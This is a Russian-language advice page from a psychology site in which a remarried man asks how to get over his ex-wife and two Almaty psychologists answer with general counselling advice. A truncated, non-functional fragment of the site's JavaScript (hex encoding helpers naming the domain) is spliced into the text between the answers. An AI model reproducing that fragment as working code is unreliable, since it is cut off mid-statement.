Как забыть бывшую жену?

Умед 14.06.2016

Год уже мы живём отдельно, но мы досех пор любим друг друга, но я во второй раз уже женился и живу с ней.. А бывшая каждый день звонит , плакаеть и умоляет что бы я простил её и развёлся с новый женой и заного жил с ней в месте. Я шас сам не свой хожу, не знаю что поделать, как быт , помогите мне пожалуйста ?

Здравствуйте Умед! Вам необходимо разобраться в себе и определиться с кем вам лучше жить, тогда вопрос что делать - отпадет.

Всего доброго!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "all-psy.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Черныш Надежда Николаевна, психолог в Алматы

     Здравствуйте, Умед!
Для начала прочтите мою статью – жмите СЮДА.
Не торопитесь принимать скорополительные решения, так как, непонятно, по какой причине вы разошлись и женились вторично? Что значит для вас любовь? Совпадают ли ваши ценности с ценностями вашей бывшей жены? Какие у вас отношения с нынешней женой? Главное, чтобы вы сделали – СОБСТВЕННЫЙ ВЫБОР, а не под чьим-то давлением! Поэтому, скажите своей бывшей, что вам нужно подумать месяц (сами определите) и чтобы она вам не звонила. Если она будет нарушать и звонить, то так же будет и потом в вашей жизни, если вы к ней вернетесь. Если она будет с уважением относиться к вашим словам и подождет, то у вас действительно появиться больше свободного времени, самостоятельно или с помощью психолога, чтобы определиться и ни о чем не жалеть ни через день, после оглашения, ни через 1 год или 10 лет! Так как, принимать решение нужно в спокойном состоянии, в трезвом разуме – без оглядок в прошлое, т.е., без сожаления, помня о том, что выбирая одно – я одновременно отказываюсь от чего-то другого.
Если в общении с другим взрослым – вы чувствуете чувство вины или стыда, или страха осуждения, или давление, то знайте, что вами – манипулируют!
Удачи вам!

Куроедова Людмила Мичеславна, психолог Алматы